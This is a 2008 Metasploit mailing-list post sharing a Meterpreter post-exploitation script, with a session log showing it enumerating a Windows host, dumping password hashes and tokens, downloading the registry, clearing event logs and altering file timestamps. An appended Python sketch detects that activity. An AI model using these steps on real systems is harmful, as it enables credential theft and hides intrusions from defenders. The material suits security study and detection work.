Metasploit mailing list archives

Fwd: Script for automating Information Gathering in windows Hosts


From: carlos_perez at darkoperator.com (Carlos Perez)
Date: Sun, 14 Dec 2008 22:25:40 -0400

Forgot to include the rest of the mailing list on the email

---------- Forwarded message ----------
From: Carlos Perez <carlos_perez at darkoperator.com>
Date: Sun, Dec 14, 2008 at 10:24 PM
Subject: Re: [framework] Script for automating Information Gathering in
windows Hosts
To: natron <natron at invisibledenizen.org>


Natron

I decided that the changes were easy, so I took a couple of minutes and made
the changes; here is the result. Now I only have to work on getting the exit
command to not bring the error message. You are given credit in the comments
and on the functions of the code I just copy-pasted. What do you think?

meterpreter > run winenum3 -h
Windows Local Enumerion Meterpreter Script by Darkoperator
Carlos Perez carlos_perez at darkoperator.com
Usage:

-h    This help message.

-m    Migrates the Meterpreter Session from it current process to a new one

-c    Changes Access Time, Modified Time and Created Time of executables
      that where run on the target machine and clear the EventLog

-r    Dumps, compresses and download entire Registry

[-] Error while running command run: exit
meterpreter > run winenum3 -m -c -r
[*] Launching hidden cmd.exe...
[*] Process 2676 created.
[*] Current process is cmd.exe (3740).  Migrating to 2676.
[*] Migration completed successfully.
[*] New server process: cmd.exe (2676)
[*] Running Windows Local Enumerion Meterpreter Script by Darkoperator
[*] New session on 192.168.1.147:1050...
[*] Saving report to /tmp/192.168.1.147_20081214.173710156
[*] Checking if WIN2K301 is a Virtual Machine ........
[*]     This is a VMware Workstation/Fusion Virtual Machine

[*]     This is a VMWare virtual Machine
[*] Running Command List ...
[*]     running command cmd.exe /c set
[*]     running command arp -a
[*]     running command ipconfig /all
[*]     running command ipconfig /displaydns
[*]     running command route print
[*]     running command net view
[*]     running command netstat -na
[*]     running command netstat -ns
[*]     running command net share
[*]     running command net group
[*]     running command net user
[*]     running command net localgroup
[*]     running command net view /domain
[*]     running command netsh firewall show config
[*]     running command tasklist /svc
[*] Running WMIC Commands ....
[*]     running command wimic computersystem list
[*]     running command wimic useraccount list
[*]     running command wimic group
[*]     running command wimic service list brief
[*]     running command wimic volume list brief
[*]     running command wimic process list brief
[*]     running command wimic startup list full
[*]     running command wimic qfe
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Dumping and Downloading the Registry
[*]     Exporting HKCU
[*]     Compressing HKCU into cab file for faster download
[*]     Exporting HKLM
[*]     Compressing HKLM into cab file for faster download
[*]     Exporting HKCC
[*]     Compressing HKCC into cab file for faster download
[*]     Exporting HKCR
[*]     Compressing HKCR into cab file for faster download
[*]     Exporting HKU
[*]     Compressing HKU into cab file for faster download
[*]     Downloading HKCU.cab to -> /tmp/192.168.1.147-HKCU.cab
[*]     Downloading HKLM.cab to -> /tmp/192.168.1.147-HKLM.cab
[*]     Downloading HKCC.cab to -> /tmp/192.168.1.147-HKCC.cab
[*]     Downloading HKCR.cab to -> /tmp/192.168.1.147-HKCR.cab
[*]     Downloading HKU.cab to -> /tmp/192.168.1.147-HKU.cab
[*]     Deleting left over files
1
[*] Clearing Event Logs, this will leave and event 517
[*]     Clearing the security Event Log
[*]     Clearing the system Event Log
[*]     Clearing the application Event Log
[*]     Clearing the directory service Event Log
[*]     Clearing the dns server Event Log
[*]     Clearing the file replication service Event Log
[*] Alll Event Logs have been cleared
[*] Changing Access Time, Modified Time and Created Time of Files Used
[*]     Changing file MACE attributes on C:\WINDOWS\system32\cmd.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\reg.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\ipconfig.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\route.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\net.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\netstat.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\netsh.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\makecab.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\tasklist.exe
[*]     Changing file MACE attributes on C:\WINDOWS\system32\wbem\wmic.exe
[*] Done!
meterpreter >
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081214/4e4cf686/attachment.htm>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: winenum3.rb
Type: application/x-ruby
Size: 13002 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081214/4e4cf686/attachment.rb>
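A defender-side detection sketch for the activity shown in the session above, added here as an example and not taken from the winenum3 script or the post: it flags the burst of enumeration binaries the command list spawns from one cmd.exe parent, and the "audit log was cleared" event (517 on Windows 2003, 1102 on later versions) that the script's own output says clearing leaves behind. The log line format and every sample line are constructed for this example, not a real Windows export.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Binaries the session above shows winenum3 spawning from its hidden cmd.exe.
RECON_BINARIES = {"arp", "ipconfig", "route", "net", "netstat", "netsh", "tasklist", "wmic", "reg"}
# 517 is the "audit log was cleared" event the script output mentions (Windows 2003); 1102 is the Vista+ equivalent.
AUDIT_CLEARED_IDS = {517, 1102}

# Constructed, simplified line format: <ISO ts> host=<name> ppid=<parent pid> eid=<event id> cmd=<command line or ->
LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) ppid=(?P<ppid>\d+) eid=(?P<eid>\d+) cmd=(?P<cmd>.*)$")

# Constructed sample: one benign ipconfig from another parent, then the script's burst and the log clear.
SAMPLE_LOG = r"""2008-12-14T16:02:00 host=WIN2K301 ppid=1234 eid=592 cmd=C:\WINDOWS\system32\ipconfig.exe /all
2008-12-14T17:37:11 host=WIN2K301 ppid=2676 eid=592 cmd=C:\WINDOWS\system32\arp.exe -a
2008-12-14T17:37:14 host=WIN2K301 ppid=2676 eid=592 cmd=C:\WINDOWS\system32\ipconfig.exe /all
2008-12-14T17:37:18 host=WIN2K301 ppid=2676 eid=592 cmd=C:\WINDOWS\system32\route.exe print
2008-12-14T17:37:22 host=WIN2K301 ppid=2676 eid=592 cmd=C:\WINDOWS\system32\net.exe view
2008-12-14T17:37:27 host=WIN2K301 ppid=2676 eid=592 cmd=C:\WINDOWS\system32\netstat.exe -na
2008-12-14T17:37:33 host=WIN2K301 ppid=2676 eid=592 cmd=C:\WINDOWS\system32\net.exe share
2008-12-14T17:37:40 host=WIN2K301 ppid=2676 eid=592 cmd=C:\WINDOWS\system32\tasklist.exe /svc
2008-12-14T17:39:02 host=WIN2K301 ppid=2676 eid=517 cmd=-""".splitlines()

def parse(line):
    """Parse one constructed log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    rec["ppid"], rec["eid"] = int(rec["ppid"]), int(rec["eid"])
    return rec

def detect(lines, window=timedelta(seconds=60), threshold=5):
    """Return alerts for audit-log-cleared events and for any parent process that
    spawns >= threshold recon binaries within `window` (the command-list burst above)."""
    alerts, spawns = [], defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        if rec["eid"] in AUDIT_CLEARED_IDS:
            alerts.append(("audit_log_cleared", rec["host"], rec["eid"]))
            continue
        # Reduce "C:\WINDOWS\system32\net.exe view" to the bare image name "net".
        exe = (rec["cmd"].split() or ["-"])[0].rsplit("\\", 1)[-1].lower()
        if exe.removesuffix(".exe") in RECON_BINARIES:
            spawns[(rec["host"], rec["ppid"])].append(rec["ts"])
    for (host, ppid), t in spawns.items():
        t.sort()
        if any(t[i + threshold - 1] - t[i] <= window for i in range(len(t) - threshold + 1)):
            alerts.append(("recon_burst", host, ppid, len(t)))
    return alerts
```

Running `detect(SAMPLE_LOG)` yields one recon_burst alert for parent 2676 and one audit_log_cleared alert; the lone ipconfig from parent 1234 stays below the threshold.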

